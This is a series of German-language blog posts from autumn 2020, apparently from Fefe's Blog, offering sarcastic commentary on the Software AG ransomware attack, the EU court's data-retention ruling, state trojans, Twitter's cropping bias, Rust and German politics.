Oh und als die Angreifer merkten, wie weit bei der Software AG die Tür offen stand, haben sie schnell noch an Daten rausgetragen was sie konnten. Auch merkt man langsam, dass die Lösegeldforderungen sich dem Marktwert anpassen. Jetzt wo die "Angriffe" soweit automatisiert und gestreamlined sind, dass man da nur noch einen Knopf drücken muss und die Daten sprudeln von überall rein. Angeblich wollen die über 20 Mio Dollar haben.
Aber Fefe, wieso kloppst du denn so auf der Software AG herum? Woher weißt du denn, dass die wirklich ihre Infrastruktur herunterkommen ließen? Vielleicht waren die ja unschuldig!!1!
Nun, … Exhibit A: Kurze Durchsage des CTO der Software AG im Jahre 2015:
Dwelling on Security Concerns Can Stifle Innovation, CTO Says
Ja aber echt mal! Dieser ganze Security-Scheiß hält doch nur auf bei den ganzen Innovationen, für die die Software AG berühmt ist! All die hochinnovativen Produkte, die die so haben! Ihr wisst schon! Sowas wie… äh… hey was machen die eigentlich? Früher haben die mal eine Datenbank namens Adabas, die dann eines Tages SAP kaufte, um das Überleben der Software zu sichern. Mit der Kohle hat sich die Software AG dann umorientiert und macht jetzt "Enterprise Integration" und "Internet of Things". Genau die Felder, auf denen man Security offensichtlich nicht braucht. Das bremst nur.
Der Lacher ist auch, wieso die überhaupt auf Security kamen in dem Gespräch. Das lag daran, dass die Software AG eine Innovations-Messe (nein, wirklich!) in Las Vegas (nein, wirklich!!) gemacht hat, und da in ihrem PR-Sprechblasenwald Security so häufig vorkam wie im alten Witz, das S in IoT stünde für Security. Daraufhin fragte ein Journalist und der CTO machte dann seinem Ärger Luft. Wenn man immer nur auf Security achten würde, hätten wir weder Autos noch Flugzeuge.
An der Stelle hab ich mich ganz doll fremdgeschämt denn was da aufhielt war Safety nicht Security. Aber hey, wieso würde sich ein CTO mit so Minutiae auskennen. Der ist Manager, der steht über den Details.
Wenn der CTO Security (Sicherheit gegen Angreifer) und Safety (Sicherheit gegen Unfälle) nicht auseinanderhalten kann, dann haben deren Produkte wahrscheinlich weder das eine noch das andere, steht zu befürchten. *grusel*
Update: Die Adabas-Story ist etwas komplexer als ich dachte. Es gibt Adabas und Adabas D. Adabas gehört nach wie vor der Software AG aber ist sogar noch Pre-SQL. Es gibt auch ein Adabas D, das basiert auf einem Zukauf. Das hat SAP gerettet, war mein Stand, aber das war anscheinend auch nur eine Lizenzierung und gehört auch noch der Software AG. SAP hat da offenbar bloß eine sehr weitgehende Lizenz erworben. SAP hat ihre Version MaxDB genannt.
[l] Ist euch aufgefallen, dass der Staat in letzter Zeit gehäuft privatrechtliche Firmen betreibt? Der Trend ist schon etwas älter und stammt aus der ungehemmten Privatisierungsideologie der 90er Jahre, als es noch um Telekom und Bahn ging. Inzwischen haben wir aber auch eine Autobahn GmbH, eine gematik, eine Flughafen Berlin Brandenburg GmbH, und jetzt ganz neu die DigitalService4Germany (*fremdschäm*).
Warum machen die das, werdet ihr euch vielleicht fragen? Nachdem die Privatisierung der Bundesdruckerei so ein Desaster war, dass der Staat sie zurückkaufen musste, nachdem die Bahn immer noch im Besitz des Bundes ist und nachdem die Flughafen-GmbH ein Emmerich-level Debakel war?
Na ganz einfach: Gerade deswegen! Denn Privatrechtliche Firmen im Bundesbesitz fallen nicht unter Transparenzgesetze.
Kurz gesagt: Wenn der Staat eine Firma gründet, dann kann man davon ausgehen, dass sie vorher schon wissen, dass das a) nichts wird und/oder b) sie massiv unlauter operieren werden und keine Transparenz haben wollen. Das ist wie wenn ein Krimineller ein Burner-Phone kauft im Hollywood-Film.

Tue Oct 6 2020

[l] Der EuGH hat sich heute zur Vorratsdatenspeicherung geäußert. Das Urteil ist eine ziemliche Katastrophe. Es ist so ein "eigentlich alles verboten bis auf Ausnahmen"-Urteil, und durch die Ausnahmen kannst du einmal einen Spähtrupp der Bundeswehr durchfahren.
Die Ausnahme ist: Ein EU-Staat fühlt sich ernsthaft bedroht. Also ... immer. Seit Jahren wurden wir mit Terror- und Gefährderrhetorik sturmreif geschossen. Jetzt haben wir die Auflösung, warum sie sich den Aufwand gemacht haben.
Aber aber Fefe, da gibt es doch Auflagen!!1! Ja, gibt es:
Droht etwa ernsthaft und nachweisbar ein Terroranschlag, dürfen Kontakt- und Standortdaten gespeichert und eingesehen werden. Einschränkung: nur so lange wie unbedingt erforderlich und ein Richter muss den Grundrechtseingriff genehmigen. Auch IP-Adressen darf die Polizei von den Internetprovidern herausverlangen.
Hinter den Nebelwörtern steckt ein Rezept für dauerhafte anlasslose Totalüberwachung. Die Beweise für drohende Terroranschläge waren bisher alle rückblickend lachhaft und nicht ernsthaft. "So lange wie unbedingt erforderlich" hat viel Interpretationsspielraum durch die Unterdrückungsbehörden, und warum sollten sie uns mitteilen, dass und wie lange sie es tun? Das macht doch nur Ärger, wenn die Bevölkerung dann klagen kann, und es gefährdet die "Ermittlungen"!1!!
Und hör mir auf mit dem Richtervorbehalt. Die Erfahrung zeigt: Der ist nicht das Papier wert, auf dem er steht. Bei Hausdurchsuchungen zeigt sich das schön. Da ist es für Richter eine Unterschrift, ein Ersuchen zu genehmigen, und vier Seiten Aufsatz um es abzuweisen. Plus, wenn sie es abweisen, und dann passiert was, dann sind sie schuld. Dreimal dürft ihr raten, wie viele Hausdurchsuchungen in der Praxis abgewiesen werden. Hint: Viele Finger braucht ihr nicht für die Rechnung.
Ich bin ziemlich entsetzt, ehrlich gesagt. Da hat der EuGH einmal etwas getan, das mir als Bürger gezeigt hat, dass die EU vielleicht doch unter dem Strich etwas positives sein kann, das Checks & Balances einführt, das freidrehende Möchtegerndiktatoren vom Weißrusslanden abhalten kann. Und dann rollen sie es wieder zurück. Zum Kotzen!

Sat Oct 3 2020

[l] Hier ist einer für die von euch, die die Last Week Tonight-Folge über diesen Dr-Evil-Minime von einem Bergbaumogul-Pleitier geguckt haben. Der Typ hat damals geklagt und verloren, aber weil er in Virginia geklagt hat (wo weder HBO noch er residieren) und die Gesetze da abenteuerlich sind, blieb HBO am Ende auf einer Rechnung von 200k für ihre Verteidigung sitzen, obwohl das Gericht in dem Fall "with prejudice" gegen Murray geurteilt hat. Das ist die härteste Niederlage, die man in den USA in einem Zivilverfahren einfahren kann. Es bedeutet, dass weitere Verfahren in der Sache ausgeschlossen ist (obwohl man gegen das Urteil auch nochmal vorgehen kann theoretisch).
Anyway, Last Week Tonight hat dann noch eine Followup-Folge über Murray gemacht mit einer tollen Musical-Nummer am Ende.
Dieser Murray ist aber auch echt ein Unsympath, wie er im Buche steht. Als seine Bergbaufirma noch nicht pleite war, hat er sein Leben lang dagegen gekämpft, dass Minenarbeiter mit Staublunge Entschädigung erhalten.
Ihr ahnt vermutlich schon, wo diese Story hingeht. Ja, richtig! Murray hat gerade Staublungen-Staatshilfe für sich beantragt.
Hmm, erst kriegen die ganzen Covid-Leugner Covid, dann kriegt der Staublungen-Villain Staublunge, ... was kommt als nächstes? Die Verantwortlichen von SPD und Grünen verlieren ihre Rentenansprüche und müssen von Hartz IV leben?

Thu Oct 1 2020

[l] Old and busted: Microsoft zerschießt mit Gammel-Updates großflächig Infrastruktur ihrer Kunden.
New hotness: Microsoft zerschießt mit Gammel-Updates großflächig ihre eigene Infrastruktur.
Ich hab ja am Anfang dieses Cloud-Trends versucht, das Positive daran zu sehen, und als einziges Pro-Argument fiel mir ein, dass die Cloud-Provider ja jetzt erstmalig ein finanzielles Interesse hätten, dass ihre beschissenen Updates auch durchlaufen.
Da hatte ich offensichtlich die Rechnung ohne den Wirt gemacht. Die können das einfach nicht.

Mon Sep 28 2020

[l] Wolfgang Clement ist gestorben und die Blätter sind voll von Nachruf-Geheuchel. Weil man ja nach all den Jahren die Vergangenheit durch eine rosige Brille sieht, möchte ich diesen Artikel von 2008 zu ihm verlinken. Der Mann war Atomlobbyist und hat dazu aufgerufen, die damalige SPD-Spitzenkandidatin für den hessischen Landtag Ypsilanti nicht zu wählen, weil sie keine neuen Kohle- und Atomkraftwerke bauen wollte. Das war damals schon genauso anstößig wie heute. Die SPD hat ihn daraufhin aus der Partei geschmissen.
Nicht wegen seiner politischen Inhalte, nein, fossile Energien sind in der SPD ja auch heute noch konsensfähig (siehe auch Gazprom-Gerd mit seinem "Grünen"-Sidekick Pipeline-Joschka). Clement war übrigens auch der "Super-Minister" unter Schröder, der die Hartz-Reformen umsetzte.
Aber rausgeflogen ist er, weil er dazu aufrief, ihre Kandidatin nicht zu wählen. Das ist der einzige "Wert", den die SPD kennt. Nibelungentreue zu den aktuellen "Hoffnungsträgern", bis sie dann bei der Wahl krachend durchfallen, weil die Gegenstimmen unterdrückt wurden. Dann stellt man einfach schnell den nächsten Hoffnungsträger auf. Ich erinnere mich schon gar nicht mehr an die ganzen Namen der Hoffnungsträger, so schnell verschleißen die die.
Aber es geht hier ja nicht um die SPD gerade.
So ein Typ war der Clement, und so haben sie ihn behandelt. Wenig überraschend kommen die Nachrufe in der Tagesschau auch alle von CDU und FDP. Die meisten Nachrufe bleiben wie in der Politik üblich unkonkret bis nebulös. Steinmeier nennt ihn einen "überzeugten und überzeugenden Demokraten" (Wie, die anderen alle nicht?!) und die Merkel spricht immerhin die Hartz-Reformen an (klar ist die CDU da froh, dass das jemand anderes gemacht hat und jetzt die ganze Wut abkriegt). Die FDP drückt dem armen Clement nachträglich noch den größten Giftdolch zwischen die Rippen, den sie finden konnten:
Ebenfalls über Twitter drückte FDP-Chef Christian Lindner die Trauer seiner Partei aus. "Als Sozialliberaler setzte er sich Zeit seines Lebens für sozialen Aufstieg, Arbeit und Wachstum ein."
Mit anderen Worten: Ideologisch war das ein FDPler. Der muss sich in der Hausnummer geirrt haben, als er in die SPD eintrat.
Update: OK, formaljuristisch ist er nicht aus der SPD rausgeflogen sondern selbst gegangen.

Thu Sep 24 2020

[l] Vorhin regte ich mich darüber auf, dass den USA nach jahrzehntelanger Duldung jetzt plötzlich auffällt, was für ein fieser Diktator Lukaschenko ist und dass man da mal was tun sollte.
Da wird sich der eine oder andere von euch gefragt haben, wieso die EU eigentlich so lange brauchte. Nun, die Antwort könnte die Bevölkerung verunsichern:
Cyprus vetoes sanctions on Belarus due to EU’s inaction against Turkey
Zypern hat das blockiert. Die EU ist ja ein Konsens-System, d.h. wenn nur einer dagegen ist, wird es nicht gemacht. Das gibt jedem Möchtegerndiktator jedes noch so kleinen Fitzelmitgliedslandes eine tolle Erpressungsmöglichkeit in die Hand. Klar sind wir für das Notfallpaket zur Rettung eurer Bauern, wenn ihr nur kurz diesen Stapel Blankoschecks ausfüllt!1!!
In diesem Fall fand Zypern, dass die EU mal gepflegt die Fresse halten sollte, wenn es um Menschenrechtsverletzungen in Weißrussland geht, denn die bedrohen keine EU-Bürger. Sie als EU-Bürger fühlen sich hingegen vom diktatorischen Gebaren des Erdogan-Regimes schon seit Jahren bedroht und da macht die EU ja auch nichts. Griechenland hat da unilateral was erreicht, aber für Zypern steht da keiner morgens früh auf und kümmert sich.
Mit der Argumentation treffen sie bei mir natürlich voll ins Mark. Ich finde auch immer: Wenn du bei einem Sanktionen ausrufst, musst du auch bei allen anderen Sanktionen ausrufen, die die gleichen Kriterien erfüllen. Insofern: Go Cyprus!
Ich persönlich würde sogar noch einen Schritt weiter gehen und sagen: Die EU sollte generell die Fresse halten, wenn es in anderen Ländern Menschenrechtsverletzungen gibt, solange bei uns Flüchtlinge in Zellen verbrennen, Flüchtlinge jahrelang in Auffanglagern unter erbärmlichsten Verhältnissen dahinvegetieren, und erst als ein völlig vermeidbarer Flächenbrand das Lager dahinrafft, geht in der EU auch nur sowas wie eine Debatte los, ob man den Flüchtlingen vielleicht mal helfen sollte.
Oh und solange wir hier ein "Polizeirecht" haben, das das vorsorgliche zeitlich unbefristete Einlochen von unschuldigen "Gefährdern" ermöglicht, sollten wir auch sehr zurückhaltend damit sein, anderen Polizeistaaten Vorwürfe zu machen.
Aber WENN wir schon anderen Vorwürfe mache, dann will ich aber MINDESTENS ernsthafte Ansätze sehen, diese Art von Problem bei uns ein für alle Mal auszuradieren, und sei es durch Zwangsrausschmiss von Bayern aus der Union.
Update: Übrigens hat auch Tilo Jung bei der BPK mal gefragt, was diese Wahl jetzt korrupter macht als die davor in Weißrussland. Die Antwort könnte die Bevölkerung sedieren.

Wed Sep 23 2020

[l] Ihr habt ja wahrscheinlich mitgekriegt, dass der Twitter-Foto-Selektionsalgorithmus ein bisschen ... selektiv arbeitet. Los ging es mit diesem schönen Beispiel (um zu sehen, was da passiert, müsst ihr auf die Vorschaubilder klicken und euch das Original angucken, aus dem der Twitter-Algorithmus die rausgezogen hat).
Ein bisschen peinlich war dann, dass Twitter in einem Statement schrieb, sie hätten ja vor dem Produktiv-Schalten den Algorithmus auf Biases getestet. Ich musste spontan an den Bullshit-Slogan aus der Werbung denken, irgendein Kosmetikum sei "dermatologisch getestet". Ja, äh, das reicht nicht. Das Ergebnis muss auch gut sein!
Ich poste das jetzt erst, weil jetzt eine Verbindung zu Deutschland existiert. Ihr müsst wieder auf alle Vorschaubilder klicken, um den Effekt zu sehen und nicht nur das Ergebnis.
Update: Das betrifft übrigens auch Michael Jackson und die Vim-oder-Emacs-Frage :-)
Update: Spaß am Rande: Trumps Selbstbräuner hat ihn für Twitters Algorithmus weniger attraktiv gemacht als Kamala Harris, der man ja am rechten Rand schon länger nachsagt, sie hätte ihre Hautfarbe mit Kosmetik gezielt aufgehellt, um wählbarer auszusehen. Ob das jetzt stimmt halte ich ja für zweifelhaft, aber dass besonders in asiatischen Kulturen wie Indien "Skin Lightening" eine viel gefragte Kosmetik-Sparte ist, ist ein Fakt. Sogar bei uns gibt es auf Amazon Hunderte von Treffern, wenn man nach Skin Lightening Cream sucht.
Update: Ein Leser weist darauf hin, dass Hautaufhellung mit (schädlichen) Kosmetika auch in Afrika ein Trend ist.

Thu Sep 17 2020

[l] Ist ja komisch! Seit bekannt wurde, dass die Polizei sich an den Corona-Meldedaten der Gastronomie vergreift, tragen die Leute da Fake-Daten ein und jetzt scheitert die Corona-Vorbeuge. VIELEN DANK, liebe Polizei! Habt ihr Deutschland wieder ein Stückchen sicherer gemacht!1!!

Thu Sep 10 2020

[l] Der Trump ist ja immer nochmal eine Größenordnung inkompetenter als man eh angenommen hat. Der erzählt uns ja seit Monaten, Covid sei nicht so schlimm, und als sich dann die Leichen stapelten erzählte er uns, er habe einen großartigen Job bei der Abwehr gemacht.
Ich habe hier ja tatsächlich immer noch Leute in der Inbox, die mir erzählen, Covid sei ja gar nicht so schlimm. Wenn Trump das sagt, wird das schon stimmen!
Nun, selbst ein Dilettant wie Donald Trump wusste ziemlich früh, dass Covid doch schlimm ist. Das wissen wir, weil der Depp das Bob Woodward auf Band gesprochen hat.
Die haben sich sogar mehrfach getroffen. Beim zweiten Treffen im März war auch öffentlich bekannt, wie schlimm Covid ist, und da hat Trump dann dem Woodward gesagt, dass er die Gefährlichkeit runterspielen werden, damit keine Panik entsteht. Anstatt eines Lockdowns lieber den Leuten ins Gesicht lügen, und auf eine göttliche Intervention warten. Faith Based Politics!
Völlig überraschend gab es die göttliche Intervention dann nicht und stattdessen die Panik, die Trump angeblich vermeiden wollte. Und hunderttausende Tote.

Wed Sep 9 2020

[l] Erinnert ihr euch, wie das Berliner Kammergericht monatelang ausgeknipst war, weil sie "Opfer eines Cyberangriffs" wurden? Ja?
Wo dann rauskam, dass die noch Windows 95 fuhren da?
Nun, das war bei den anderen Gerichten nicht anders mit Windows 95. Also haben die mal ein Upgrade zu Windows 10 gemacht.
Ohne die Hardware zu upgraden. Völlig überraschend stellt sich raus, dass das möglicherweise nicht so flutscht wie man gehofft hätte. Und jetzt? Na klar!
Inzwischen soll es Überlegungen geben, wieder auf die alte Windows95-Umgebung zurück zu wechseln.
NEEEEIIIINNNNN!!!
[l] Schlechter Tag für Elon Musk: Tesla-Aktienkurs bricht um 30% ein. Warum? Nun, ...
Dem Konzern war die Aufnahme in den S&P 500 Aktienindex verweigert worden, was unter anderem zu einem Kursrutsch von 20 Prozent führte. Einen Platz im S&P 500 bekam stattdessen die E-Commerce-Plattform für Selbstgemachtes Etsy.
Ausgebootet von Etsy! HAHAHAHAH OMG!
Den Abstand zwischen den Börsen und der Realwirtschaft muss man inzwischen in Parsec angeben.
Aber ist ja auch klar. Wir stecken ja mitten in der nächsten sinnlosen Tech-Bubble drin. Da wird dann auch nicht mehr rational entschieden, klar.
Wieviele der S&P 500 sind eigentlich Firmen, die Produkte herstellen?

Sat Aug 29 2020

[l] Benutzt hier jemand Slack?
Warum nicht Teams? Die nehmen das wenigstens ernst mit dem Datenschutz!
Unter uns: Beides finde ich völlig abwegig. Das ist geradezu für Deppen-Manager gemacht, die sich an der Illusion von Kontrolle über ihre Leute aufgeilen, aber eigentlich nur die ganze Zeit im Weg rumstehen.
Ist ja komisch, Cheffe! Ich frage alle 10 Minuten nach einem Statusupdate und packe denen ständig Meetings in den Kalender, wieso kriegen die denn nichts fertig?! Das liegt bestimmt an denen.

Fri Aug 28 2020

[l] Manchmal gibt es Artikel, die mir echt die Schuhe ausziehen. Hier ist so einer: Polen zögert gerade die formale Zulassung des neuen deutschen Botschafters hinaus. Hmm, das ist ja komisch. Wie das wohl kommt? Na gucken wir doch mal.
Der 64-jährige von Loringhoven, den Berlin als Botschafter in Warschau haben möchte, gilt als politisches Schwergewicht.
Ist ja merkwürdig! Wieso würden die Polen so jemanden nicht haben wollen? Ein Mysterium, sage ich euch!
Er war früher Leiter der politischen Abteilung der deutschen Botschaft in Moskau, Botschafter in Tschechien, Vizepräsident des Bundesnachrichtendienstes und zuletzt Geheimdienstkoordinator der NATO.
Die politische Abteilung der Botschaft ist ein Euphemismus für Aufklärung im militärischen Sinne. Jetzt zu sagen, dass das alles Geheimdienstler sind, ist möglicherweise eine Übertreibung, aber nicht viel, wie man am Rest des Satzes sehen kann. Und dann auch noch in Moskau, den Intimfreunden der Polen! Und Vizepräsident des BND! Das ist doch genau die Art von Person, die man als Diplomat einer fremden Macht ins Land lassen will!1!!
So und jetzt der Teil, der mir die Schuhe auszog: Das ist nicht der Grund, wieso Polen den nicht reinlässt.
Für Aufsehen sorgte in Polen indes vor allem die Herkunft des designierten Botschafters: Sein Vater Berndt Freytag von Loringhoven war als Adjutant beim Generalstab der Wehrmacht in den letzten Kriegstagen ein enger Mitarbeiter Adolf Hitlers. Bis zuletzt bereitete er im Führerbunker die Lagebesprechungen vor. Seine Militärkarriere setzte er in der Bundeswehr fort.
Wait … WHAT!?!? Nicht nur hat der Typ seine Karriere in der Bundeswehr fortsetzen können, sondern sein Sohn macht jetzt Aufklärung in Botschaften und wird offen Geheimdienstvizepräsident?!?!?
Da hat die Entnazifizierung wohl gerade Pinkelpause gemacht oder wie oder was?
[l] VÖLLIG ÜBERRASCHEND hat das Berliner Verwaltungsgericht das Verbot der Covidioten-Demo gekippt. Wer hätte das gedacht, dass du nicht einfach eine Demo verbieten kannst, weil bei einer anderen Demo einzelne Leute Mist gemacht haben?
Zu schade eigentlich, sonst hätte man in Zukunft jede fucking Demo verbieten können, denn auf praktischen allen relevanten Vordemos gab es irgendwas zu beanstanden. Und sei des von Polizeiprovokateuren herbeigeführte "Gewalt".
Mann wäre das schön gewesen! Einfach so durchregieren!!1!
Jetzt wird halt gemacht, was man die ganze Zeit schon hätte machen sollen: Man fährt da halt großzügig dimensioniert Polizei auf und die ziehen dann die Einzelnen aus der Demo raus, die sich nicht an die Auflagen halten.
Ist mir ja ehrlich gesagt völlig schleierhaft, wieso die Deppen gegen Maskenpflicht demonstrieren. Dabei ist das die Ausnahme für das Vermummungsverbot auf Demos, was den Demonstranten erlaubt hätte, endlich mal unerkannt wunderbar Bullshit zu erzählen und herumzuhetzen. Aber hey, wenn die schlau wären, würden sie nicht mit Bill-Gates-Verschwörungstheoretikern und Impfungen-machen-Autismus-Sprallos und Reichsbürgern zusammen gegen Corona-Maßnahmen demonstrieren. Und so wird es halt Fotos der Gesichter der Idioten geben und man wird sie wunderbar nachträglich strafverfolgen können.
Find ick jut. Spart dem Steuerzahler Kosten. Die gesparte Kohle kann man dann anderswo ausgehen. Z.B. für Corona-Maßnahmen.

Wed Aug 26 2020

[l] Wenn es euch wie mir geht, dann seid ihr von "neue Programmiersprache"-Meldungen nur noch genervt. Heutzutage kann sich praktisch jeder Depp kurz eine Programmiersprache zusammenklicken, und die meisten Neuvorstellungen machen genau nichts interessantes, probieren nichts aus, wagen nichts.
Das ist schade, weil dabei die paar tatsächlichen neuen Ideen unter den Tisch fallen. Rust hat einige aus meiner Sicht wirklich vielversprechende Ideen, und ich wollte mal meinen Teil tun, damit die Leute, die Rust gebrauchen können, zumindest die Konzepte mal gehört haben.
Daher habe ich das für Heise mal kurz aufgeschrieben. Wohlgemerkt ist das kein "Rust lernen in 5 Minuten"-Artikel und die mut-Syntax funktioniert ist Rust nicht genau so wie da steht. Das habe ich gemacht, um von der Syntax zu abstrahieren, denn zumindest aus meiner Sicht sind Syntaxänderungen der am wenigsten interessante Aspekt, den neue Programmiersprachen ändern können. Ich fühle mich von sinnlosen Syntaxänderungen sogar aktiv abgestoßen, weil es der Adoption der Sprache im Weg steht, wenn es mich zum Umlernen meiner angewöhnten Schnelltippmuster zwingt. Daher habe ich von der Syntax von Rust in dem Artikel wegabstrahiert und mich auf die zwei in meinen Augen wichtigsten Konzepte konzentriert: Die Umstellung von const auf mut und die Umstellung von "der Compiler darf warnen, wenn er Mist erkennt" hin zu "der Compiler nimmt es nur, wenn er beweisen kann, dass es kein Murks ist". Beides sind aus meiner Sicht die Umsetzung der "fail safe"-Idee aus dem Maschinenbau.
Ich bin selten optimistisch bei neuer Technologie. Aber Rust ist da aus meiner Sicht eine Ausnahme. Da merkt man an den Änderungen, dass nicht nur jemand rumgespielt hat, sondern dass da jemand ernsthaft geguckt hat, woran es im Moment krankt, und neuartige Lösungen gesucht hat.
Eigentlich geht es mir auch gar nicht um Rust sondern um die Konzepte. Rust hatte neulich einen tollen Skandal um ein Webservice-Framework in Rust, bei dem sich rausstellte, dass der Autor praktisch alle Rust-Konzepte ignoriert und überall unsafe Code geschrieben hat. unsafe ist die Rust-Version von const_cast in C++ — eine fundamental schlechte Idee. Und das sieht man halt von außem der Library oder dem Framework nicht an, ob das unter der Haube ordentlicher idiomatischer Rust-Code ist oder so eine unsafe-Klärgrube. Rust hätte hier noch deutlich weiter gehen können. Aber immerhin sind sie (als einzige) überhaupt mal soweit gegangen, wie sie gegangen sind.
Update: Zur Medienkompetenzschulung veröffentliche ich bei sowas immer meine Rohfassung.

Fri Aug 21 2020

[l] Der Berliner Bürgermeister heißt Michael Müller und ist in der SPD. Er ist mir bisher nicht weiter aufgefallen. So ein Verwaltungsheini. Hat nichts verbessert aber auch nichts aktiv weiter kaputtgemacht. Im Vergleich mit anderen Berliner Bürgermeistern also in den oberen 10%, weil er keinen Bankenskandal und keinen Skandalflughafenprojekt zu verantworten hat wie seine Vorgänger. Also ja, er hat BER nicht aus der Scheiße gezogen, aber das ist glaube ich eine unrealistische Anforderung.
Der Müller hat sich jetzt entschieden, dass er gerne in den Bundestag will. Wahrscheinlich weil die SPD auf Landesebene so gut wie abgewählt ist und er da als "Sieger" gehen will, nicht als abgewählter Bürohengst.
Der steht inhaltlich auch nicht für gar nichts, sondern der hat z.B. den Mietendeckel zu verantworten. Ob der jetzt gut oder schlecht ist, das müsst ihr euch selbst überlegen. Man könnte sagen: Immerhin hat er mal was ausprobiert und nicht immer nur Reden geschwungen.
Gut, aber in welchem Wahlkreis soll sich der Müller aufstellen? Wohnen tut er in Tempelhof, aber da kandidiert bereits Juso-Papiertiger Kevin "DAGEGEN!!1!" Kühnert, in der Presse in letzter Zeit ab und zu tragisch mit einem Hoffnungsträger verwechselt. Also hat sich der Müller entschieden, dann halt in Charlottenburg-Wilmersdorf zu kandidieren. Tempelhof wird wohl parteiintern für sowas wie einen "sicheren Sitz" gehalten. Wer da kandidiert, kommt durch. In Charlottenburg-Wilmersdorf hat die SPD aber auch gut abgeschnitten die letzten Wahlen. Charlottenburg-Wilmersdorf ist offenbar der zweitsicherste Weg.
Und was passiert jetzt? Jetzt stellt sich plötzlich Sawsan Chebli auch in Charlottenburg-Wilmersdorf und auch für die SPD auf.
Die Reaktion darauf war fast als wäre der Bürgerkrieg ausgebrochen.
Ich persönlich assoziiere mit der SPD nur negatives, wisst ihr ja, und würde gerne niemanden von der Verräterpartei im Bundestag sehen. Inhaltlich steht der Müller immerhin für was, während ich die Chebli bisher eher als Witzfigur wahrgenommen habe. Jahrelang hat die in der Bundespressekonferenz Realsatire geliefert, wenn Tilo Jung mal was gefragt hat. Da kamen die absurdesten Bullshit-Verrenkungen von ihr. Gut, da kann sie nichts für, aber sie hätte den Job ja nicht annehmen müssen. Danach war sie Staatssekretärin und ist vor allem durch Forderungen aufgefallen, die genau ihr selbst geholfen hätten. Mehr Frauen, mehr Migrationshintergrund, mehr Frauen mit Migrationshintergrund, ein bisschen Woke-Blablah, sonst fällt mir gerade inhaltlich nichts ein, wofür die steht. Oh ach ja, und sie hat Leute verklagt, die im Internet böse Dinge über sie gesagt haben.
Bei mir persönlich würde das also eher keine Begeisterungsstürme auslösen, wenn die jetzt in den Bundestag einzieht. Aaaaaber. Wie die SPD gerade mit ihr umgeht, das lässt echt tief blicken. Das offenbart, wie die Abgeordnetensitze sehen. Nicht als etwas, was man sich erstreitet, und was der kriegt, dem am besten das tut, was die Wähler haben wollen. Nein, nein! Eher etwas, das man erbt, eine Belohnung für braves Partei-Mitläufertum. Der Wähler spielt offenbar überhaupt keine Rolle bei denen!
Die Chebli hat hier noch am ehesten das getan, was meinem Verständnis entspricht, wie das gedacht war. Die hat sich einfach aufgestellt. Der Wähler sollte bitte entscheiden, wer ins Parlament einzieht, nicht innerparteiliche Absprachen und Nepotismus.
Sehe ich auch so. Daher, wenn die SPD schon unbedingt ins Parlament einziehen muss, dann würde ich jetzt lieber ihr den Sitz gönnen. Aber eigentlich finde ich, die SPD muss endlich unter die 5%-Hürde. Nicht mal dafür sind die kompetent genug, das mal zeitnah durchzuziehen.

Tue Aug 18 2020

[l] Hattet ihr gedacht, mit dem Staatstrojaner, äh, der "Quellen-TKÜ" sei jetzt schon alles geklärt? Denn mehr Zugriff als Geräte hacken geht ja nicht?
Da habt ihr euch getäuscht! Denn bisher war es ja nicht explizit erlaubt, neben den neuen Kommunikationsvorgängen auch die alten auszuspähen. Diese Regulierungslücke wird jetzt geschlossen!1!!
Die zweite Methode, auf die man sich in Berlin inzwischen geeinigt hat, ist eine Neuschöpfung: die sogenannte "Quellen-TKÜ plus". Die Idee lautet, dass die Agenten nicht nur die laufende Kommunikation mitlesen, sondern auch rückwirkend von dem Moment der Bewilligung dieser Spionagemaßnahme an alte Kommunikation ausforschen dürfen. Das bedeutet einen Zugriff auf gespeicherte Mails und Chats. Die Ermittler werden rechtlich so gestellt, als hätten sie sofort nach Erteilung ihres Auftrags loslegen können - und nicht erst Zeit verloren durch das technisch aufwendige Infiltrieren des Geräts.
Och joh, die armen Beamten des Überwachungsstaat verlieren regelmäßig wertvolle Zeit, wenn sie sich in eure Geräte hacken müssen! Eine Runde Mitleid für den armen Unterdrückungsstaat! Wie soll man denn die Leute unmündig halten, wenn man ihnen nicht ordentlich mit krass asymmetrischer Machtausübung drohen kann?
Tja, bei einem Trog von 58 Millionen Smartphone-Nutzern in Deutschland kommen halt auch entsprechend viele besonders hartnäckige Schweine.
[l] Der Secret Service hat zwar keine Befugnis, die Positionsdaten von Amerikanern zu erheben, aber dass sie sie nicht auf dem Schwarzmarkt kaufen dürfen stand da nicht.
Ich bin mir sicher, dass da dasselbe verschissene Äquivalenzdenken dahinter stand wie in der IT Security häufig. Ja klar kann ein Angreifer den ganzen Rechner kompromittieren, wenn er einen USB-Stick mit manipuliertem Dateisystem einsteckt, aber aber aber wenn er so nah an den Rechner rankommt, könnte er ihn auch direkt mit einem Vorschlaghammer demolieren!1!!
Und am Ende fixt keiner seinen Teil des Problems, weil es ja auch noch andere Wege gibt. Die wiederum machen ihren Teil nicht zu, weil wir hier noch nicht zugemacht haben. Und am Ende sind alle unsicher, bis ein Idealist vorbeikommt, der einfach immer alles ordentlich machen möchte und ohne Vergleich mit anderen immer alles absichert.

Sun Aug 16 2020

[l] Kennt ihr den schon? Die Amis "beschlagnahmen" Öltanker aus dem Iran in Richtung Venezuela.
The Wall Street Journal reported Thursday, citing US officials, that the ships had been seized at sea and were en route to Houston.
Das ist nicht wie Piraterie, das ist Piraterie.
Naja, denkt ihr euch jetzt vielleicht, wenn die Amis das in amerikanischen Hoheitsgewässern gemacht haben, dann ist das vielleicht doch keine Piraterie. Naja, äh, aber wo genau war denn diese Beschlagnahme? Ist nicht so klar! Hier ist, was die Washington Post dazu schreibt:
It is not clear where the vessels — the Bella, Bering, Pandi and Luna — or their cargoes currently are. But the ship captains weeks ago turned off their tracking devices to hide their locations, said Russ Dallen, a Miami-based partner at brokerage Caracas Capital Markets, who follows ship movements.
The Bering went dark on May 11 in the Mediterranean near Greece and has not turned on its transponder since, while the Bella did the same July 2 in the Philippines, Dallen said. The Luna and Pandi were last spotted when they were together in the Gulf of Oman on July 10 when the U.S. seizure order came.
Das könnt ihr euch ja selber überlegen, ob ihr glaubt, dass Schiffe, die ihren Transponder abschalten, um ihre Position vor den Amis geheimzuhalten, ob die dann durch amerikanische Hoheitsgewässer schippern würden.

Sat Aug 15 2020

[l] Die Klimaforschung warnt ja seit Jahren vor selbstverstärkenden Feedbackschleifen. Das ist eine Situation, die von alleine schlimmer wird, selbst wenn wir von heute auf morgen nichts mehr emittieren würden. Die Gletscher von Grönland haben jetzt offenbar so einen Punkt erreicht.
Herzlichen Glückwunsch, liebe Menschheit. Toll gemacht.
